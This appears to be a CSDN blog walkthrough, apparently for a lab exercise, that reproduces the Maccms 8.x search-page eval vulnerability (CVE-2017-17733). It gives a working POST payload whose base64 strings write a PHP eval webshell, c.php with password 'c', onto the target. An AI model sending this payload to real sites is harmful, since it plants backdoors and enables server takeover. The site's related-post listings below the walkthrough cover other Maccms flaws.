maccms 远程命令执行(CVE-2017-17733)复现

最新推荐文章于 2023-11-16 22:50:28 发布
最新推荐文章于 2023-11-16 22:50:28 发布
阅读量778 收藏
点赞数 1
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63124284/article/details/127578933
版权

一、漏洞简介

魅魔电影程序(Maccms PHP)是一套采用PHP/MySQL数据库运行的全新且完善的强大视频电影系统。完美支持众多视频网站和高清播放器(youku,tudou,qvod,gvod等),完全免费开源。该漏洞主要的产生原因是CMS搜索页面搜索参数过滤不严导致直接eval执行PHP语句。

二、漏洞影响

Maccms8.x

三、漏洞复现

1、访问特定URLhttp://ip:port/index.php?m=vod-search

2、开启抓包

修改一:

改为POST请求

修改二:

添加POST提交的数据 上传一句话木马

wd={if-A:print(fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}

3、 访问页面测试是否上传成功 c.php密码c

4、链接后门获取flag

恸.283
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
maccmsv10仿优酷模版最新修复bug完美版
03-22
maccmsv10仿优酷模版最新修复bug完美版,是小的我经过修改的完美版本,修复了部分图片显示不全的问题,放大了今日热点图片显示。留言框更加美观贴心! 演示站点:http://tsmp4.net
苹果CMS漏洞
热门推荐
Grey的博客
07-11 1万+
1.环境搭建: 最新版本好像修复了这个漏洞 后来看大佬们分析是加了360safe、把他注释掉就可以复现了 审计过程:   首先在maccms8_mfb\inc\module\vod.php文件中的第93-98行的代码当$method=search成立的时候便回进入到be(“all”, “wd”)获取请求中wd参数的值,并使用chkSql($wd)方法对$wd进行安全处理。 ...
网站漏洞修补之苹果cms建站系统
网站漏洞修复专家
04-22 1085
苹果cms系统,是目前很多电影网站都在使用的一套网站系统,开源,免费,扩展性较好,支持一键采集,伪静态化,高并发的同时承载,获得的很多站长的喜欢,于近日被网站安全检测发现,maccms存在网站漏洞,sql注入盲射获取数据库的管理员账号密码,关于该漏洞的详情,我们仔细分析看下. maccms漏洞分析与修复 苹果CMS采用的是php语言开发的代码,使用的数据库是mysql类型,这种架构是比较常用的...
苹果cms最新漏洞总是被挂马跳转劫持 如何解决
网站安全专家
01-02 3962
2020年刚开始,苹果CMS被爆出数据库代码执行漏洞,大量的电影网站被挂马,尤其电影的页面被篡改植入了恶意代码,数据库中的VOD表里的d_name被全部修改,导致网站打开后直接跳转到S站或者弹窗广告,目前该maccms漏洞受影响的苹果系统版本是V8,V10,很多客户网站被反复篡改,很无奈,通过朋友介绍找到我们SINE安全寻求技术上支持,防止网站被挂马。根据客户的反应,服务器采用的是linux ce...
Maccms8.x 命令执行漏洞分析
fly小灰灰的专栏
07-30 6955
1. 漏洞描述 漏洞简述: Maccms搜索页面搜索输入参数过滤不严谨导致前台命令执行可getshell 影响版本: Maccms8.x 2. 漏洞简介  魅魔电影程序(Maccms PHP)是一套采用PHP/MySQL数据库运行的全新且完善的强大视频电影系统。完美支持众多视频网站和高清播放器(youku,tudou,qvod,gvod等),完全免费开源。  该漏洞主要的产生原因是CMS搜索页面搜索
MacCms10潜藏后门分析
Fly_鹏程万里
10-15 6359
影响范围 MacCMS 10 漏洞危害 潜藏后门 攻击类型 潜藏后门 利用条件 在影响范围内的MacCMS CVE编号 无 漏洞概述 苹果CMS程序是一套采用PHP+MYSQL环境下运行的完善而强大的快速建站系统。具有程序体积小、运行速度快等特征,只要普通的虚拟主机就可以完美搭建起来,建站成本非常低。而且仿MVC模板分离,内置标签,自定义函数标签接口,强大的自定义采集功能,只...
如何使用php判断远程图片文件是否存在
徊忆羽菲
07-03 364
使用php判断远程图片文件是否存在fopen()方法mode 参数的可能的值 fopen()方法 看看文件能否打开,能打就文件当然就存在 <?php $url = 'http://www.qipa250.com/images/qipa250.jpg'; if( @fopen( $url, 'r' ) ) { echo 'File Exits'; } else { echo 'File Do Not Exits'; } ?> 语法:fopen(filename,mode
漏洞复现maccms苹果cms 命令执行漏洞
最新发布
失心少年
11-16 1387
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。“苹果CMS” 似乎是指 “Maccms”,这是一款开源的内容管理系统,主要用于搭建视频网站。Maccms 提供了一套完整的解决方案,包括用户管理、视频上传、分类管理、数据统计等功能,使用户能够方便地创建和管理自己的视频网站。
漏洞复现】六、maccms 远程命令执行CVE-2017-17733
weixin_52351575的博客
09-21 498
这个马子进行了编码绕过,通过base64编码写入一句话木马
maccms代码审计——前台sql注入漏洞
willow_liang的博客
11-06 1916
漏洞存在路径:C:\phpstudy\WWW\maccms\inc\common\function.php第572行的htmlEncode函数 审计过程: 1.在C:\phpstudy\WWW\maccms\inc\module\vod.php93-98 2.跟进图中的be方法
maccms-cve_2017_17733漏洞复现
qq_51459600的博客
03-02 3920
maccms-cve_2017_17733 Maccms是一套跨平台的基于PHP和MySQL快速建站系统。 Maccms 8.x版本中存在安全漏洞远程攻击者可借助index.php?m=vod-search请求中的‘wd’参数利用该漏洞执行命令。 环境搭建 靶机:CentOS7(192.168.2.110) 利用本地vulfocus平台一键搭建maccms环境: 环境搭建完成 漏洞利用 访问http://192.168.2.110:59973/index.php?m=vod-search post提
最新解密苹果MacCms播放器playerJS 去播放器广告 基于maccms8.x 2017.09.27
11-25
MacCms源文件里的player.js是加密的,加密的文件内置小广告比牛皮癣还多。 不但影响使用,且不方便修改,所以,有了解密文件,福音就来了。 下载后,在解密后的播放器文件里,自己把加密文件的外部链接换成自己的,就可以了。 代码不熟悉的,可以搜索在线JS转HTML代码工具,进行更直观的替换、修改。 基于发布日期:2017.09.27 再也不用为苹果CMS播放器代码加密问题头疼了。 好东西就是拿来分享的。 注意:文档只是把加密的东西,解密出来,广告链接并未删除,请自己换成自己的或删除吧 雨过天晴工作室制作发布 有任何需要请联系我
魅魔视频电影程序(MacCMS ASP) 6.1 20120511-ASP源码.zip
12-12
ASP源码,压缩包解压密码:www.cqlsoft.com
maccms10-mytheme-21
03-20
maccms10-mytheme-21
maccms10-mytheme-26
03-18
maccms10-mytheme-26
maccms10-mytheme-18
03-18
maccms10-mytheme-18
maccms10-master_maccms_maccms官网_maccms10_苹果_nan_
10-04
苹果官网关闭后的版本 已更新至2020.1.3日
CMS漏洞(发货100CMS、SHECMS、ZHCMSMACCMS)详解实战
xinyue9966的博客
02-18 6794
CMS漏洞发货100CMS(弱口令)介绍系统版本靶场搭建漏洞复现修复方案SHECMS(SQL注入)介绍系统版本靶场搭建漏洞复现修复方案ZHCMS(文件上传)介绍系统版本靶场搭建漏洞复现修复方案MACCMS(CNVD-2019-43865)介绍系统版本靶场搭建漏洞复现修复方案 发货100CMS(弱口令) 介绍 弱口令漏洞 由于网站用户帐号存在弱口令,导致攻击者通过弱口令可轻松登录到网站中,从而进行下一步的攻击,如上传webshell,获取敏感数据。另外攻击者利用弱口令登录网站管理后台,可执行任意管理员的操作
vulfocus——maccms远程命令执行(CVE-2017-17733
m0_62063669的博客
09-12 1301
Maccms 8.x版本中存在安全漏洞远程攻击者可借助index.php?m=vod-search请求中的‘wd’参数利用该漏洞执行命令。2.借助index.php?m=vod-search请求中的‘wd’参数利用该漏洞执行命令。利用浏览器浏览器发送POST数据包或直接使用Python编写的脚本进行发送POST数据包。3.进行攻击,该payload是直接生成一个c.php一句话木马文件,连接密码为c。Maccms是一套跨平台的基于PHP和MySQL快速建站系统。
maccms10 采集
07-28
根据引用\[1\]中提供的信息,maccms10可以使用以下采集接口进行影视资源的采集: - 百度云资源:https://api.apibdzy.com/api.php/provide/vod/?ac=list - U酷资源-百度云资源的子站:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值